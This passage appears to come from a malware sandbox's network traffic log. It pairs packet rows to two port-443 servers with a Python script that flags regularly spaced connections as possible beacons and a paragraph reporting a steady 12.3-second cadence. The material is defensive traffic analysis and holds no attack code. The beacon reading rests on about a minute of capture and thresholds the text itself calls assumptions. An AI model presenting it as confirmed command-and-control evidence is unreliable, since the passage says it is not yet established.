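Jan 10, 2025 16:02:23.885042906 CET | 443 | 49708 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:24.530599117 CET | 443 | 49708 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:25.074887991 CET | 49710 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:36.199043989 CET | 49780 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:37.414457083 CET | 49787 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:48.495605946 CET | 49856 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:49.644726038 CET | 49866 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:03:00.777019024 CET | 49933 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:01.818093061 CET | 49941 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:03:12.933109999 CET | 49981 | 443 | 192.168.2.10 | 142.250.184.238
"""
EPOCH = datetime(2025, 1, 1)  # only differences matter, so any fixed reference will do


def parse_timestamp(text: str) -> float:
    """'Jan 10, 2025 16:02:23.761857986 CET' -> seconds since EPOCH, keeping the nanosecond digits
    (strptime's %f only takes six digits, so the fraction is handled separately)."""
    stamp, frac = text.rsplit(" ", 1)[0].split(".")
    base = datetime.strptime(stamp, "%b %d, %Y %H:%M:%S")
    return (base - EPOCH).total_seconds() + int(frac) / 10 ** len(frac)


def parse_rows(table: str) -> list:
    """One dict per packet with the two endpoints as (ip, port) tuples."""
    rows = []
    for line in table.strip().splitlines():
        ts, sport, dport, sip, dip = [c.strip() for c in line.split("|")]
        rows.append({"t": parse_timestamp(ts), "src": (sip, int(sport)), "dst": (dip, int(dport))})
    return rows


def build_flows(rows: list) -> dict:
    """Bidirectional flows keyed by (client, server); the endpoint with the lower port (443) is the server."""
    flows = {}
    for r in rows:
        client, server = sorted((r["src"], r["dst"]), key=lambda e: -e[1])
        f = flows.setdefault((client, server), {"first": r["t"], "last": r["t"], "c2s": 0, "s2c": 0})
        f["first"], f["last"] = min(f["first"], r["t"]), max(f["last"], r["t"])
        f["c2s" if r["src"] == client else "s2c"] += 1
    return flows


def connection_intervals(flows: dict) -> dict:
    """Per server endpoint: gaps between successive connection starts, their mean, and the
    coefficient of variation (stdev / mean). A low CV over several gaps is the beacon signal."""
    starts = defaultdict(list)
    for (_client, server), f in flows.items():
        starts[server].append(f["first"])
    out = {}
    for server, ts in starts.items():
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        if len(gaps) < 2:   # one gap says nothing about regularity
            out[server] = {"gaps": gaps, "mean": gaps[0] if gaps else None, "cv": None}
            continue
        mean = statistics.mean(gaps)
        out[server] = {"gaps": gaps, "mean": mean, "cv": statistics.stdev(gaps) / mean}
    return out


def beacon_candidates(flows: dict, min_gaps: int = 3, max_cv: float = 0.1) -> list:
    """Servers contacted at least min_gaps+1 times with jitter below max_cv (thresholds are assumptions)."""
    stats = connection_intervals(flows)
    return sorted(s for s, v in stats.items() if len(v["gaps"]) >= min_gaps and v["cv"] is not None and v["cv"] <= max_cv)


if __name__ == "__main__":
    flows = build_flows(parse_rows(PACKETS))
    for server, v in connection_intervals(flows).items():
        print(server, [round(g, 2) for g in v["gaps"]], "mean=%.2fs cv=%.4f" % (v["mean"], v["cv"]))
    print("beacon candidates:", beacon_candidates(flows))
```

Both servers come out with a mean gap near 12.3 s and a coefficient of variation below 0.01. The caveat before reading that as command-and-control: a fixed retry loop, such as a downloader re-fetching its next stage, produces exactly the same cadence as a heartbeat, the capture here spans barely a minute, and the TLS payload is opaque in this table. Confirm what the sessions carry with the TLS fingerprint and host data elsewhere in the report, and whether the destinations are attacker-controlled or a public service the sample merely abuses, before turning the interval into a detection.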
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 16:02:23.761857986 CET | 49708 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:23.761888981 CET | 443 | 49708 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:23.762059927 CET | 49708 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:23.885025978 CET | 49708 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:23.885042906 CET | 443 | 49708 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:24.530599117 CET | 443 | 49708 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:24.530736923 CET | 49708 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:24.531414986 CET | 443 | 49708 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:24.531481028 CET | 49708 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:24.704308033 CET | 49708 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:24.704332113 CET | 443 | 49708 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:24.704668999 CET | 443 | 49708 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:24.705135107 CET | 49708 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:24.732578039 CET | 49708 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:24.779323101 CET | 443 | 49708 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:25.047743082 CET | 443 | 49708 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:25.048029900 CET | 49708 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:25.048047066 CET | 443 | 49708 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:25.048201084 CET | 49708 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:25.048201084 CET | 49708 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:25.048248053 CET | 443 | 49708 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:25.048413992 CET | 443 | 49708 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:25.048506975 CET | 49708 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:25.048507929 CET | 49708 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:25.074887991 CET | 49710 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:25.074927092 CET | 443 | 49710 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:25.075213909 CET | 49710 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:25.075541973 CET | 49710 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:25.075551987 CET | 443 | 49710 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:25.705897093 CET | 443 | 49710 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:25.706192970 CET | 49710 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:25.710899115 CET | 49710 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:25.710906982 CET | 443 | 49710 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:25.711226940 CET | 443 | 49710 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:25.711642027 CET | 49710 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:25.711781025 CET | 49710 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:25.755330086 CET | 443 | 49710 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:26.113558054 CET | 443 | 49710 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:26.113622904 CET | 443 | 49710 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:26.113683939 CET | 443 | 49710 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:26.113682985 CET | 49710 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:26.113682985 CET | 49710 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:26.113749027 CET | 49710 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:26.169022083 CET | 49710 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:26.169050932 CET | 443 | 49710 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:36.199043989 CET | 49780 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:36.199093103 CET | 443 | 49780 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:36.199202061 CET | 49780 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:36.199436903 CET | 49780 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:36.199450970 CET | 443 | 49780 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:36.853045940 CET | 443 | 49780 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:36.853132963 CET | 49780 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:36.853825092 CET | 443 | 49780 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:36.853893995 CET | 49780 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:36.855505943 CET | 49780 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:36.855519056 CET | 443 | 49780 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:36.855767012 CET | 443 | 49780 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:36.855833054 CET | 49780 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:36.856147051 CET | 49780 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:36.899326086 CET | 443 | 49780 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:37.344922066 CET | 443 | 49780 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:37.345063925 CET | 49780 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:37.346051931 CET | 443 | 49780 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:37.346107006 CET | 443 | 49780 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:37.346120119 CET | 49780 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:37.346153975 CET | 49780 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:37.346436977 CET | 49780 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:37.346457005 CET | 443 | 49780 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:37.346472025 CET | 49780 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:37.346507072 CET | 49780 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:37.414457083 CET | 49787 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:37.414510965 CET | 443 | 49787 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:37.414601088 CET | 49787 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:37.414880991 CET | 49787 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:37.414891005 CET | 443 | 49787 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:38.051625967 CET | 443 | 49787 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:38.051733017 CET | 49787 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:38.091120005 CET | 49787 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:38.091140985 CET | 443 | 49787 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:38.095698118 CET | 49787 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:38.095704079 CET | 443 | 49787 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:38.471332073 CET | 443 | 49787 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:38.471379995 CET | 443 | 49787 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:38.471419096 CET | 49787 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:38.471441031 CET | 443 | 49787 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:38.471452951 CET | 443 | 49787 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:38.471456051 CET | 49787 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:38.471488953 CET | 49787 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:38.472024918 CET | 49787 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:38.472038031 CET | 443 | 49787 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:48.495605946 CET | 49856 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:48.495712042 CET | 443 | 49856 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:48.495930910 CET | 49856 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:48.496135950 CET | 49856 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:48.496184111 CET | 443 | 49856 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:49.152767897 CET | 443 | 49856 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:49.152909994 CET | 49856 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:49.153419971 CET | 49856 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:49.153430939 CET | 443 | 49856 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:49.153598070 CET | 49856 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:49.153604031 CET | 443 | 49856 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:49.635363102 CET | 443 | 49856 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:49.635473967 CET | 49856 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:49.635509014 CET | 443 | 49856 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:49.635533094 CET | 443 | 49856 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:49.635564089 CET | 49856 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:49.635595083 CET | 49856 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:49.635703087 CET | 49856 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:49.635723114 CET | 443 | 49856 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:49.635745049 CET | 49856 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:49.635768890 CET | 49856 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:49.644726038 CET | 49866 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:49.644767046 CET | 443 | 49866 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:49.644881010 CET | 49866 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:49.645052910 CET | 49866 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:49.645072937 CET | 443 | 49866 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:50.273226976 CET | 443 | 49866 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:50.273291111 CET | 49866 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:50.273746967 CET | 49866 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:50.273761988 CET | 443 | 49866 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:50.273994923 CET | 49866 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:50.274007082 CET | 443 | 49866 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:50.751805067 CET | 443 | 49866 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:50.751872063 CET | 443 | 49866 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:50.751887083 CET | 49866 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:50.751897097 CET | 443 | 49866 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:50.751919031 CET | 49866 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:50.751945972 CET | 443 | 49866 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:02:50.751962900 CET | 49866 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:50.752002001 CET | 49866 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:50.754822016 CET | 49866 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:02:50.754837036 CET | 443 | 49866 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:03:00.777019024 CET | 49933 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:00.777051926 CET | 443 | 49933 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:03:00.777225971 CET | 49933 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:00.777648926 CET | 49933 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:00.777663946 CET | 443 | 49933 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:03:01.409368992 CET | 443 | 49933 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:03:01.409519911 CET | 49933 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:01.410052061 CET | 49933 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:01.410062075 CET | 443 | 49933 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:03:01.410130024 CET | 49933 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:01.410135984 CET | 443 | 49933 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:03:01.800108910 CET | 443 | 49933 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:03:01.800410032 CET | 49933 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:01.800410032 CET | 49933 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:01.800455093 CET | 443 | 49933 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:03:01.800612926 CET | 443 | 49933 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:03:01.800662041 CET | 49933 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:01.800662041 CET | 49933 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:01.818093061 CET | 49941 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:03:01.818157911 CET | 443 | 49941 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:03:01.818259954 CET | 49941 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:03:01.818542004 CET | 49941 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:03:01.818562984 CET | 443 | 49941 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:03:02.472721100 CET | 443 | 49941 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:03:02.472904921 CET | 49941 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:03:02.473412037 CET | 49941 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:03:02.473438025 CET | 443 | 49941 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:03:02.473575115 CET | 49941 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:03:02.473588943 CET | 443 | 49941 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:03:02.889415979 CET | 443 | 49941 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:03:02.889506102 CET | 49941 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:03:02.889516115 CET | 443 | 49941 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:03:02.889532089 CET | 443 | 49941 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:03:02.889580011 CET | 443 | 49941 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:03:02.889586926 CET | 49941 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:03:02.889619112 CET | 49941 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:03:02.892173052 CET | 49941 | 443 | 192.168.2.10 | 142.250.186.97
Jan 10, 2025 16:03:02.892189980 CET | 443 | 49941 | 142.250.186.97 | 192.168.2.10
Jan 10, 2025 16:03:12.933109999 CET | 49981 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:12.933167934 CET | 443 | 49981 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:03:12.933254957 CET | 49981 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:12.933594942 CET | 49981 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:12.933604956 CET | 443 | 49981 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:03:13.602880955 CET | 443 | 49981 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:03:13.603127003 CET | 49981 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:13.603976011 CET | 443 | 49981 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:03:13.604047060 CET | 49981 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:13.605720997 CET | 49981 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:13.605734110 CET | 443 | 49981 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:03:13.606080055 CET | 443 | 49981 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:03:13.606136084 CET | 49981 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:03:13.606533051 CET | 49981 | 443 | 192.168.2.10 | 142.250.184.238
                                                                        Jan 10, 2025 16:03:13.651325941 CET44349981142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:13.998424053 CET44349981142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:13.998493910 CET49981443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:13.998733044 CET44349981142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:13.998796940 CET44349981142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:13.998819113 CET49981443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:13.998837948 CET49981443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:13.999001026 CET49981443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:13.999001026 CET49981443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:13.999022961 CET44349981142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:13.999160051 CET49981443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:14.007627964 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:14.007678032 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:14.007749081 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:14.008101940 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:14.008126020 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:14.656549931 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:14.656636000 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:14.661947966 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:14.661963940 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:14.662148952 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:14.662153006 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:15.080645084 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:15.080703974 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:15.080734968 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:15.080750942 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:15.080759048 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:15.080791950 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:15.081510067 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:15.081543922 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:15.081605911 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:25.105837107 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:25.105884075 CET44349983142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:25.105957985 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:25.106316090 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:25.106333017 CET44349983142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:25.756721973 CET44349983142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:25.756869078 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:25.757426977 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:25.757440090 CET44349983142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:25.757635117 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:25.757642031 CET44349983142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:26.160593033 CET44349983142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:26.160664082 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:26.160692930 CET44349983142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:26.160733938 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:26.160835028 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:26.160875082 CET44349983142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:26.160921097 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:26.177356958 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:26.177387953 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:26.177637100 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:26.177723885 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:26.177741051 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:26.837132931 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:26.837497950 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:26.839214087 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:26.839222908 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:26.839531898 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:26.839624882 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:26.839939117 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:26.883327961 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:27.293531895 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:27.293607950 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:27.293689966 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:27.293730974 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:27.293730974 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:27.293730974 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:27.299340963 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:27.299365044 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:37.323337078 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:37.323362112 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:37.323455095 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:37.323765993 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:37.323772907 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:37.952819109 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:37.952980042 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:37.953627110 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:37.953696012 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:37.955790997 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:37.955796957 CET44349985142.250.184.238192.168.2.10
